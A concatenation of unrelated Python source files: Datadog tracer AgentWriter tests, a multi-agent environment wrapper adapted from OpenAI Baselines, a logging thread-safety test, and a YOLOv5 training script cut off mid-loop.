mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
],
any_order=True,
)
def test_drop_reason_bad_endpoint(self):
statsd = mock.Mock()
writer_metrics_reset = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
writer._metrics_reset = writer_metrics_reset
for i in range(10):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.stop()
writer.join()
writer_metrics_reset.assert_called_once()
assert 1 == writer._metrics["http.errors"]["count"]
assert 10 == writer._metrics["http.dropped.traces"]["count"]
def test_drop_reason_trace_too_big(self):
statsd = mock.Mock()
writer_metrics_reset = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
writer._metrics_reset = writer_metrics_reset
for i in range(10):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.write([Span(name="a" * 5000, trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(2 ** 10)])
writer.stop()
writer.join()
writer_metrics_reset.assert_called_once()
assert 1 == writer._metrics["buffer.dropped.traces"]["count"]
assert ["reason:t_too_big"] == writer._metrics["buffer.dropped.traces"]["tags"]
def test_drop_reason_buffer_full(self):
statsd = mock.Mock()
writer_metrics_reset = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", buffer_size=5300, dogstatsd=statsd, report_metrics=False)
writer._metrics_reset = writer_metrics_reset
for i in range(10):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.write([Span(name="a", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.stop()
writer.join()
writer_metrics_reset.assert_called_once()
assert 1 == writer._metrics["buffer.dropped.traces"]["count"]
assert ["reason:full"] == writer._metrics["buffer.dropped.traces"]["tags"]
def test_drop_reason_encoding_error(self):
n_traces = 10
statsd = mock.Mock()
writer_encoder = mock.Mock()
writer_encoder.__len__ = (lambda *args: n_traces).__get__(writer_encoder)
writer_metrics_reset = mock.Mock()
writer_encoder.encode.side_effect = Exception
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
writer._encoder = writer_encoder
writer._metrics_reset = writer_metrics_reset
for i in range(n_traces):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.stop()
writer.join()
writer_metrics_reset.assert_called_once()
assert 10 == writer._metrics["encoder.dropped.traces"]["count"]
def test_keep_rate(self):
statsd = mock.Mock()
writer_run_periodic = mock.Mock()
writer_put = mock.Mock()
writer_put.return_value = Response(status=200)
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
writer.run_periodic = writer_run_periodic
writer._put = writer_put
traces = [
[Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)] for i in range(4)
]
traces_too_big = [
[Span(name="a" * 5000, trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(2 ** 10)]
for i in range(4)
]
# 1. We write 4 traces successfully.
for trace in traces:
writer.write(trace)
writer.flush_queue()
payload = msgpack.unpackb(writer_put.call_args.args[0])
# No previous drops.
assert 0.0 == writer._drop_sma.get()
# 4 traces written.
assert 4 == len(payload)
# 100% of traces kept (refers to the past).
# No traces sent before now so 100% kept.
for trace in payload:
assert 1.0 == trace[0]["metrics"].get(KEEP_SPANS_RATE_KEY, -1)
# 2. We fail to write 4 traces because of size limitation.
for trace in traces_too_big:
writer.write(trace)
writer.flush_queue()
# 50% of traces were dropped historically.
# 4 successfully written before and 4 dropped now.
assert 0.5 == writer._drop_sma.get()
# put not called since no new traces are available.
writer_put.assert_called_once()
# 3. We write 2 traces successfully.
for trace in traces[:2]:
writer.write(trace)
writer.flush_queue()
payload = msgpack.unpackb(writer_put.call_args.args[0])
# 40% of traces were dropped historically.
assert 0.4 == writer._drop_sma.get()
# 2 traces written.
assert 2 == len(payload)
# 50% of traces kept (refers to the past).
# We had 4 successfully written and 4 dropped.
for trace in payload:
assert 0.5 == trace[0]["metrics"].get(KEEP_SPANS_RATE_KEY, -1)
# 4. We write 1 trace successfully and fail to write 3.
writer.write(traces[0])
for trace in traces_too_big[:3]:
writer.write(trace)
writer.flush_queue()
payload = msgpack.unpackb(writer_put.call_args.args[0])
# 50% of traces were dropped historically.
assert 0.5 == writer._drop_sma.get()
# 1 trace written.
assert 1 == len(payload)
# 60% of traces kept (refers to the past).
# We had 4 successfully written, then 4 dropped, then 2 written.
for trace in payload:
assert 0.6 == trace[0]["metrics"].get(KEEP_SPANS_RATE_KEY, -1)
class LogWriterTests(BaseTestCase):
N_TRACES = 11
def create_writer(self):
self.output = DummyOutput()
writer = LogWriter(out=self.output)
for i in range(self.N_TRACES):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(7)])
return writer
def test_log_writer(self):
self.create_writer()
self.assertEqual(len(self.output.entries), self.N_TRACES)
def test_humansize():
assert _human_size(0) == "0B"
assert _human_size(999) == "999B"
assert _human_size(1000) == "1KB"
assert _human_size(10000) == "10KB"
assert _human_size(100000) == "100KB"
assert _human_size(1000000) == "1MB"
assert _human_size(10000000) == "10MB"
assert _human_size(1000000000) == "1GB"
class _BaseHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
error_message_format = "%(message)s\n"
error_content_type = "text/plain"
@staticmethod
def log_message(format, *args): # noqa: A002
pass
class _APIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
expected_path_prefix = None
def do_PUT(self):
if self.expected_path_prefix is not None:
assert self.path.startswith(self.expected_path_prefix)
self.send_error(200, "OK")
class _TimeoutAPIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
def do_PUT(self):
# This server sleeps longer than our timeout
time.sleep(5)
class _ResetAPIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
def do_PUT(self):
return
_HOST = "0.0.0.0"
_PORT = 8743
_TIMEOUT_PORT = _PORT + 1
_RESET_PORT = _TIMEOUT_PORT + 1
class UDSHTTPServer(socketserver.UnixStreamServer, BaseHTTPServer.HTTPServer):
def server_bind(self):
BaseHTTPServer.HTTPServer.server_bind(self)
def _make_uds_server(path, request_handler):
server = UDSHTTPServer(path, request_handler)
t = threading.Thread(target=server.serve_forever)
# Set daemon just in case something fails
t.daemon = True
t.start()
# Wait for the server to start
resp = None
while resp != 200:
conn = UDSHTTPConnection(server.server_address, _HOST, 2019)
try:
conn.request("PUT", "/")
resp = get_connection_response(conn).status
finally:
conn.close()
time.sleep(0.01)
return server, t
@pytest.fixture
def endpoint_uds_server():
socket_name = tempfile.mktemp()
handler = _APIEndpointRequestHandlerTest
server, thread = _make_uds_server(socket_name, handler)
handler.expected_path_prefix = "/v0."
try:
yield server
finally:
handler.expected_path_prefix = None
server.shutdown()
thread.join()
os.unlink(socket_name)
def _make_server(port, request_handler):
server = BaseHTTPServer.HTTPServer((_HOST, port), request_handler)
t = threading.Thread(target=server.serve_forever)
# Set daemon just in case something fails
t.daemon = True
t.start()
return server, t
@pytest.fixture(scope="module")
def endpoint_test_timeout_server():
server, thread = _make_server(_TIMEOUT_PORT, _TimeoutAPIEndpointRequestHandlerTest)
try:
yield thread
finally:
server.shutdown()
thread.join()
@pytest.fixture(scope="module")
def endpoint_test_reset_server():
server, thread = _make_server(_RESET_PORT, _ResetAPIEndpointRequestHandlerTest)
try:
yield thread
finally:
server.shutdown()
thread.join()
@pytest.fixture
def endpoint_assert_path():
handler = _APIEndpointRequestHandlerTest
server, thread = _make_server(_PORT, handler)
def configure(expected_path_prefix=None):
handler.expected_path_prefix = expected_path_prefix
return thread
try:
yield configure
finally:
handler.expected_path_prefix = None
server.shutdown()
thread.join()
def test_agent_url_path(endpoint_assert_path):
# test without base path
endpoint_assert_path("/v0.")
writer = AgentWriter(agent_url="http://%s:%s/" % (_HOST, _PORT))
writer._encoder.put([Span("foobar")])
writer.flush_queue(raise_exc=True)
# test without base path nor trailing slash
writer = AgentWriter(agent_url="http://%s:%s" % (_HOST, _PORT))
writer._encoder.put([Span("foobar")])
writer.flush_queue(raise_exc=True)
# test with a base path
endpoint_assert_path("/test/v0.")
writer = AgentWriter(agent_url="http://%s:%s/test/" % (_HOST, _PORT))
writer._encoder.put([Span("foobar")])
writer.flush_queue(raise_exc=True)
def test_flush_connection_timeout_connect():
writer = AgentWriter(agent_url="http://%s:%s" % (_HOST, 2019))
if PY3:
exc_type = OSError
else:
exc_type = socket.error
with pytest.raises(exc_type):
writer._encoder.put([Span("foobar")])
writer.flush_queue(raise_exc=True)
def test_flush_connection_timeout(endpoint_test_timeout_server):
writer = AgentWriter(agent_url="http://%s:%s" % (_HOST, _TIMEOUT_PORT))
with pytest.raises(socket.timeout):
writer._encoder.put([Span("foobar")])
writer.flush_queue(raise_exc=True)
def test_flush_connection_reset(endpoint_test_reset_server):
writer = AgentWriter(agent_url="http://%s:%s" % (_HOST, _RESET_PORT))
if PY3:
exc_types = (httplib.BadStatusLine, ConnectionResetError)
else:
exc_types = (httplib.BadStatusLine,)
with pytest.raises(exc_types):
writer._encoder.put([Span("foobar")])
writer.flush_queue(raise_exc=True)
def test_flush_connection_uds(endpoint_uds_server):
writer = AgentWriter(agent_url="unix://%s" % endpoint_uds_server.server_address)
writer._encoder.put([Span("foobar")])
writer.flush_queue(raise_exc=True)
def test_flush_queue_raise():
writer = AgentWriter(agent_url="http://dne:1234")
# Should not raise
writer.write([])
writer.flush_queue(raise_exc=False)
error = OSError if PY3 else IOError
with pytest.raises(error):
writer.write([])
writer.flush_queue(raise_exc=True)
def test_racing_start():
writer = AgentWriter(agent_url="http://dne:1234")
def do_write(i):
writer.write([Span(str(i))])
ts = [threading.Thread(target=do_write, args=(i,)) for i in range(100)]
for t in ts:
t.start()
for t in ts:
t.join()
assert len(writer._encoder) == 100
def test_additional_headers():
with override_env(dict(_DD_TRACE_WRITER_ADDITIONAL_HEADERS="additional-header:additional-value,header2:value2")):
writer = AgentWriter(agent_url="http://localhost:9126")
assert writer._headers["additional-header"] == "additional-value"
assert writer._headers["header2"] == "value2"
def test_bad_encoding(monkeypatch):
monkeypatch.setenv("DD_TRACE_API_VERSION", "foo")
with pytest.raises(ValueError):
AgentWriter(agent_url="http://localhost:9126")
@pytest.mark.parametrize(
"init_api_version,api_version,endpoint,encoder_cls",
[
(None, "v0.3", "v0.3/traces", MSGPACK_ENCODERS["v0.3"]),
("v0.3", "v0.3", "v0.3/traces", MSGPACK_ENCODERS["v0.3"]),
("v0.4", "v0.4", "v0.4/traces", MSGPACK_ENCODERS["v0.4"]),
("v0.5", "v0.5", "v0.5/traces", MSGPACK_ENCODERS["v0.5"]),
],
)
def test_writer_recreate_api_version(init_api_version, api_version, endpoint, encoder_cls):
writer = AgentWriter(agent_url="http://dne:1234", api_version=init_api_version)
assert writer._api_version == api_version
assert writer._endpoint == endpoint
assert isinstance(writer._encoder, encoder_cls)
writer = writer.recreate()
assert writer._api_version == api_version
assert writer._endpoint == endpoint
assert isinstance(writer._encoder, encoder_cls)
def test_writer_reuse_connections_envvar(monkeypatch):
monkeypatch.setenv("DD_TRACE_WRITER_REUSE_CONNECTIONS", "false")
writer = AgentWriter(agent_url="http://localhost:9126")
assert not writer._reuse_connections
monkeypatch.setenv("DD_TRACE_WRITER_REUSE_CONNECTIONS", "true")
writer = AgentWriter(agent_url="http://localhost:9126")
assert writer._reuse_connections
def test_writer_reuse_connections():
# Ensure connection is not reused
writer = AgentWriter(agent_url="http://localhost:9126", reuse_connections=True)
# Do an initial flush to get a connection
writer.flush_queue()
assert writer._conn is None
writer.flush_queue()
assert writer._conn is None
def test_writer_reuse_connections_false():
# Ensure connection is reused
writer = AgentWriter(agent_url="http://localhost:9126", reuse_connections=False)
# Do an initial flush to get a connection
writer.flush_queue()
conn = writer._conn
# And another to potentially have it reset
writer.flush_queue()
assert writer._conn is conn
|
env_wrappers.py
|
"""
Modified from OpenAI Baselines code to work with multi-agent envs
"""
import numpy as np
from multiprocessing import Process, Pipe
from baselines.common.vec_env import VecEnv, CloudpickleWrapper
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if all(done):
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
elif cmd == 'get_agent_types':
if all([hasattr(a, 'adversary') for a in env.agents]):
remote.send(['adversary' if a.adversary else 'agent' for a in
env.agents])
else:
remote.send(['agent' for _ in env.agents])
else:
raise NotImplementedError
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.remotes[0].send(('get_agent_types', None))
self.agent_types = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
class DummyVecEnv(VecEnv):
def __init__(self, env_fns):
self.envs = [fn() for fn in env_fns]
env = self.envs[0]
VecEnv.__init__(self, len(env_fns), env.observation_space, env.action_space)
if all([hasattr(a, 'adversary') for a in env.agents]):
self.agent_types = ['adversary' if a.adversary else 'agent' for a in
env.agents]
else:
self.agent_types = ['agent' for _ in env.agents]
self.ts = np.zeros(len(self.envs), dtype='int')
self.actions = None
def step_async(self, actions):
self.actions = actions
def step_wait(self):
results = [env.step(a) for (a,env) in zip(self.actions, self.envs)]
obs, rews, dones, infos = map(np.array, zip(*results))
self.ts += 1
for (i, done) in enumerate(dones):
if all(done):
obs[i] = self.envs[i].reset()
self.ts[i] = 0
self.actions = None
validity = [a.reliable for a in self.envs[0].agents]
return np.array(obs), np.array(rews), np.array(dones), infos, validity
def reset(self):
results = [env.reset() for env in self.envs]
validity = [a.reliable for a in self.envs[0].agents]
return np.array(results), validity
def render(self, close = True):
results = [env.render(close=close) for env in self.envs]
return results
def close(self):
return
|
log_test16.py
|
#!/usr/bin/env python
#
# Copyright 2001-2002 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# This file is part of the Python logging distribution. See
# http://www.red-dove.com/python_logging.html
#
"""
A test harness for the logging module. Tests thread safety.
Copyright (C) 2001-2002 Vinay Sajip. All Rights Reserved.
"""
import logging, logging.handlers, thread, threading, random
logging.raiseExceptions = 1
NUM_THREADS = 10
LOOP_COUNT = 10000
LOG_MESSAGES = [
(logging.DEBUG, "%3d This is a %s message", "debug"),
(logging.INFO, "%3d This is an %s message", "informational"),
(logging.WARNING, "%3d This is a %s message", "warning"),
(logging.ERROR, "%3d This is an %s message", "error"),
(logging.CRITICAL, "%3d This is a %s message", "critical"),
]
LOG_NAMES = ["A", "A.B", "A.B.C", "A.B.C.D"]
def doLog(num):
logger = logging.getLogger('')
logger.info("*** thread %s started (%d)", thread.get_ident(), num)
for i in xrange(LOOP_COUNT):
logger = logging.getLogger(random.choice(LOG_NAMES))
a = random.choice(LOG_MESSAGES)
args = a[0:2] + (num,) + a[2:]
apply(logger.log, args)
def test():
f = logging.Formatter("%(asctime)s %(levelname)-9s %(name)-8s %(thread)5s %(message)s")
root = logging.getLogger('')
root.setLevel(logging.DEBUG)
h = logging.FileHandler('thread.log', 'w')
root.addHandler(h)
h.setFormatter(f)
h = logging.handlers.SocketHandler('localhost', logging.handlers.DEFAULT_TCP_LOGGING_PORT)
#h = logging.handlers.DatagramHandler('localhost', logging.handlers.DEFAULT_UDP_LOGGING_PORT)
root.addHandler(h)
threads = []
for i in xrange(NUM_THREADS):
threads.append(threading.Thread(target=doLog, args=(len(threads),)))
for t in threads:
t.start()
for t in threads:
t.join()
if __name__ == "__main__":
test()
|
run_yolov5_train.py
|
import argparse
import logging
import math
import os
import random
import time
from copy import deepcopy
from pathlib import Path
from threading import Thread
import numpy as np
import torch.distributed as dist
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
import torch.utils.data
import yaml
from torch.cuda import amp
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
import test # import all_test.py to get mAP after each epoch
from models.experimental import attempt_load
from models.yolo import Model
from utils.autoanchor import check_anchors
from utils.datasets import create_dataloader
from utils.general import labels_to_class_weights, increment_path, labels_to_image_weights, init_seeds, \
fitness, strip_optimizer, get_latest_run, check_dataset, check_file, check_git_status, check_img_size, \
check_requirements, print_mutation, set_logging, one_cycle, colorstr
from utils.google_utils import attempt_download
from utils.loss import ComputeLoss
from utils.plots import plot_images, plot_labels, plot_results, plot_evolution
from utils.torch_utils import ModelEMA, select_device, intersect_dicts, torch_distributed_zero_first, is_parallel
logger = logging.getLogger(__name__)
def train(hyp, opt, device, tb_writer=None, wandb=None):
logger.info(colorstr('hyperparameters: ') + ', '.join(f'{k}={v}' for k, v in hyp.items()))
save_dir, epochs, batch_size, total_batch_size, weights, rank = \
Path(opt.save_dir), opt.epochs, opt.batch_size, opt.total_batch_size, opt.weights, opt.global_rank
# Directories
wdir = save_dir / 'weights'
wdir.mkdir(parents=True, exist_ok=True) # make dir
last = wdir / 'last.pt'
best = wdir / 'fp60_best.pt'
results_file = save_dir / 'results.txt'
# Save run settings
with open(save_dir / 'hyp.yaml', 'w') as f:
yaml.dump(hyp, f, sort_keys=False)
with open(save_dir / 'opt.yaml', 'w') as f:
yaml.dump(vars(opt), f, sort_keys=False)
# Configure
plots = not opt.evolve # create plots
cuda = device.type != 'cpu'
init_seeds(2 + rank)
with open(opt.data) as f:
data_dict = yaml.load(f, Loader=yaml.SafeLoader) # data dict
with torch_distributed_zero_first(rank):
check_dataset(data_dict) # check
train_path = data_dict['train']
test_path = data_dict['val']
nc = 1 if opt.single_cls else int(data_dict['nc']) # number of classes
names = ['item'] if opt.single_cls and len(data_dict['names']) != 1 else data_dict['names'] # class names
assert len(names) == nc, '%g names found for nc=%g dataset in %s' % (len(names), nc, opt.data) # check
# Model
pretrained = weights.endswith('.pt')
if pretrained:
with torch_distributed_zero_first(rank):
attempt_download(weights) # download if not found locally
ckpt = torch.load(weights, map_location=device) # load checkpoint
model = Model(opt.cfg or ckpt['model'].yaml, ch=3, nc=nc, anchors=hyp.get('anchors')).to(device) # create
exclude = ['anchor'] if (opt.cfg or hyp.get('anchors')) and not opt.resume else [] # exclude keys
state_dict = ckpt['model'].float().state_dict() # to FP32
state_dict = intersect_dicts(state_dict, model.state_dict(), exclude=exclude) # intersect
model.load_state_dict(state_dict, strict=False) # load
logger.info('Transferred %g/%g items from %s' % (len(state_dict), len(model.state_dict()), weights)) # report
else:
model = Model(opt.cfg, ch=3, nc=nc, anchors=hyp.get('anchors')).to(device) # create
# Freeze
freeze = [] # parameter names to freeze (full or partial)
for k, v in model.named_parameters():
v.requires_grad = True # train all layers
if any(x in k for x in freeze):
print('freezing %s' % k)
v.requires_grad = False
# Optimizer
nbs = 64 # nominal batch size
accumulate = max(round(nbs / total_batch_size), 1) # accumulate loss before optimizing
hyp['weight_decay'] *= total_batch_size * accumulate / nbs # scale weight_decay
logger.info(f"Scaled weight_decay = {hyp['weight_decay']}")
pg0, pg1, pg2 = [], [], [] # optimizer parameter groups
for k, v in model.named_modules():
if hasattr(v, 'bias') and isinstance(v.bias, nn.Parameter):
pg2.append(v.bias) # biases
if isinstance(v, nn.BatchNorm2d):
pg0.append(v.weight) # no decay
elif hasattr(v, 'weight') and isinstance(v.weight, nn.Parameter):
pg1.append(v.weight) # apply decay
if opt.adam:
optimizer = optim.Adam(pg0, lr=hyp['lr0'], betas=(hyp['momentum'], 0.999)) # adjust beta1 to momentum
else:
optimizer = optim.SGD(pg0, lr=hyp['lr0'], momentum=hyp['momentum'], nesterov=True)
optimizer.add_param_group({'params': pg1, 'weight_decay': hyp['weight_decay']}) # add pg1 with weight_decay
optimizer.add_param_group({'params': pg2}) # add pg2 (biases)
logger.info('Optimizer groups: %g .bias, %g conv.weight, %g other' % (len(pg2), len(pg1), len(pg0)))
del pg0, pg1, pg2
# Scheduler https://arxiv.org/pdf/1812.01187.pdf
# https://pytorch.org/docs/stable/_modules/torch/optim/lr_scheduler.html#OneCycleLR
if opt.linear_lr:
lf = lambda x: (1 - x / (epochs - 1)) * (1.0 - hyp['lrf']) + hyp['lrf'] # linear
else:
lf = one_cycle(1, hyp['lrf'], epochs) # cosine 1->hyp['lrf']
scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
# plot_lr_scheduler(optimizer, scheduler, epochs)
# Logging
if rank in [-1, 0] and wandb and wandb.run is None:
opt.hyp = hyp # add hyperparameters
wandb_run = wandb.init(config=opt, resume="allow",
project='YOLOv5' if opt.project == 'runs/train' else Path(opt.project).stem,
name=save_dir.stem,
entity=opt.entity,
id=ckpt.get('wandb_id') if 'ckpt' in locals() else None)
loggers = {'wandb': wandb} # loggers dict
# EMA
ema = ModelEMA(model) if rank in [-1, 0] else None
# Resume
start_epoch, best_fitness = 0, 0.0
if pretrained:
# Optimizer
if ckpt['optimizer'] is not None:
optimizer.load_state_dict(ckpt['optimizer'])
best_fitness = ckpt['best_fitness']
# EMA
if ema and ckpt.get('ema'):
ema.ema.load_state_dict(ckpt['ema'].float().state_dict())
ema.updates = ckpt['updates']
# Results
if ckpt.get('training_results') is not None:
results_file.write_text(ckpt['training_results']) # write results.txt
# Epochs
start_epoch = ckpt['epoch'] + 1
if opt.resume:
assert start_epoch > 0, '%s training to %g epochs is finished, nothing to resume.' % (weights, epochs)
if epochs < start_epoch:
logger.info('%s has been trained for %g epochs. Fine-tuning for %g additional epochs.' %
(weights, ckpt['epoch'], epochs))
epochs += ckpt['epoch'] # finetune additional epochs
del ckpt, state_dict
# Image sizes
gs = max(int(model.stride.max()), 32) # grid size (max stride)
nl = model.model[-1].nl # number of detection layers (used for scaling hyp['obj'])
imgsz, imgsz_test = [check_img_size(x, gs) for x in opt.img_size] # verify imgsz are gs-multiples
# DP mode
if cuda and rank == -1 and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
# SyncBatchNorm
if opt.sync_bn and cuda and rank != -1:
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model).to(device)
logger.info('Using SyncBatchNorm()')
# Trainloader
dataloader, dataset = create_dataloader(train_path, imgsz, batch_size, gs, opt,
hyp=hyp, augment=True, cache=opt.cache_images, rect=opt.rect, rank=rank,
world_size=opt.world_size, workers=opt.workers,
image_weights=opt.image_weights, quad=opt.quad, prefix=colorstr('train: '))
mlc = np.concatenate(dataset.labels, 0)[:, 0].max() # max label class
nb = len(dataloader) # number of batches
assert mlc < nc, 'Label class %g exceeds nc=%g in %s. Possible class labels are 0-%g' % (mlc, nc, opt.data, nc - 1)
# Process 0
if rank in [-1, 0]:
testloader = create_dataloader(test_path, imgsz_test, batch_size * 2, gs, opt, # testloader
hyp=hyp, cache=opt.cache_images and not opt.notest, rect=True, rank=-1,
world_size=opt.world_size, workers=opt.workers,
pad=0.5, prefix=colorstr('val: '))[0]
if not opt.resume:
labels = np.concatenate(dataset.labels, 0)
c = torch.tensor(labels[:, 0]) # classes
# cf = torch.bincount(c.long(), minlength=nc) + 1. # frequency
# model._initialize_biases(cf.to(device))
if plots:
plot_labels(labels, names, save_dir, loggers)
if tb_writer:
tb_writer.add_histogram('classes', c, 0)
# Anchors
if not opt.noautoanchor:
check_anchors(dataset, model=model, thr=hyp['anchor_t'], imgsz=imgsz)
model.half().float() # pre-reduce anchor precision
# DDP mode
if cuda and rank != -1:
model = DDP(model, device_ids=[opt.local_rank], output_device=opt.local_rank)
# Model parameters
hyp['box'] *= 3. / nl # scale to layers
hyp['cls'] *= nc / 80. * 3. / nl # scale to classes and layers
hyp['obj'] *= (imgsz / 640) ** 2 * 3. / nl # scale to image size and layers
model.nc = nc # attach number of classes to model
model.hyp = hyp # attach hyperparameters to model
model.gr = 1.0 # iou loss ratio (obj_loss = 1.0 or iou)
model.class_weights = labels_to_class_weights(dataset.labels, nc).to(device) * nc # attach class weights
model.names = names
# Start training
t0 = time.time()
nw = max(round(hyp['warmup_epochs'] * nb), 1000) # number of warmup iterations, max(3 epochs, 1k iterations)
# nw = min(nw, (epochs - start_epoch) / 2 * nb) # limit warmup to < 1/2 of training
maps = np.zeros(nc) # mAP per class
results = (0, 0, 0, 0, 0, 0, 0) # P, R, mAP@.5, mAP@.5-.95, val_loss(box, obj, cls)
scheduler.last_epoch = start_epoch - 1 # do not move
scaler = amp.GradScaler(enabled=cuda)
compute_loss = ComputeLoss(model) # init loss class
logger.info(f'Image sizes {imgsz} train, {imgsz_test} all_test\n'
f'Using {dataloader.num_workers} dataloader workers\n'
f'Logging results to {save_dir}\n'
f'Starting training for {epochs} epochs...')
for epoch in range(start_epoch, epochs): # epoch ------------------------------------------------------------------
model.train()
# Update image weights (optional)
if opt.image_weights:
# Generate indices
if rank in [-1, 0]:
cw = model.class_weights.cpu().numpy() * (1 - maps) ** 2 / nc # class weights
iw = labels_to_image_weights(dataset.labels, nc=nc, class_weights=cw) # image weights
dataset.indices = random.choices(range(dataset.n), weights=iw, k=dataset.n) # rand weighted idx
# Broadcast if DDP
if rank != -1:
indices = (torch.tensor(dataset.indices) if rank == 0 else torch.zeros(dataset.n)).int()
dist.broadcast(indices, 0)
if rank != 0:
dataset.indices = indices.cpu().numpy()
# Update mosaic border
# b = int(random.uniform(0.25 * imgsz, 0.75 * imgsz + gs) // gs * gs)
# dataset.mosaic_border = [b - imgsz, -b] # height, width borders
mloss = torch.zeros(4, device=device) # mean losses
if rank != -1:
dataloader.sampler.set_epoch(epoch)
pbar = enumerate(dataloader)
logger.info(('\n' + '%10s' * 8) % ('Epoch', 'gpu_mem', 'box', 'obj', 'cls', 'total', 'labels', 'img_size'))
if rank in [-1, 0]:
pbar = tqdm(pbar, total=nb) # progress bar
optimizer.zero_grad()
for i, (imgs, targets, paths, _) in pbar: # batch -------------------------------------------------------------
ni = i + nb * epoch # number integrated batches (since train start)
imgs = imgs.to(device, non_blocking=True).float() / 255.0 # uint8 to float32, 0-255 to 0.0-1.0
# Warmup
if ni <= nw:
xi = [0, nw] # x interp
# model.gr = np.interp(ni, xi, [0.0, 1.0]) # iou loss ratio (obj_loss = 1.0 or iou)
accumulate = max(1, np.interp(ni, xi, [1, nbs / total_batch_size]).round())
for j, x in enumerate(optimizer.param_groups):
# bias lr falls from 0.1 to lr0, all other lrs rise from 0.0 to lr0
x['lr'] = np.interp(ni, xi, [hyp['warmup_bias_lr'] if j == 2 else 0.0, x['initial_lr'] * lf(epoch)])
if 'momentum' in x:
x['momentum'] = np.interp(ni, xi, [hyp['warmup_momentum'], hyp['momentum']])
# Multi-scale
if opt.multi_scale:
sz = random.randrange(imgsz * 0.5, imgsz * 1.5 + gs) // gs * gs # size
sf = sz / max(imgs.shape[2:]) # scale factor
if sf != 1:
ns = [math.ceil(x * sf / gs) * gs for x in imgs.shape[2:]] # new shape (stretched to gs-multiple)
imgs = F.interpolate(imgs, size=ns, mode='bilinear', align_corners=False)
# Forward
with amp.autocast(enabled=cuda):
pred = model(imgs) # forward
loss, loss_items = compute_loss(pred, targets.to(device)) # loss scaled by batch_size
if rank != -1:
loss *= opt.world_size # gradient averaged between devices in DDP mode
if opt.quad:
loss *= 4.
# Backward
scaler.scale(loss).backward()
# Optimize
if ni % accumulate == 0:
scaler.step(optimizer) # optimizer.step
scaler.update()
optimizer.zero_grad()
if ema:
ema.update(model)
# Print
if rank in [-1, 0]:
mloss = (mloss * i + loss_items) / (i + 1) # update mean losses
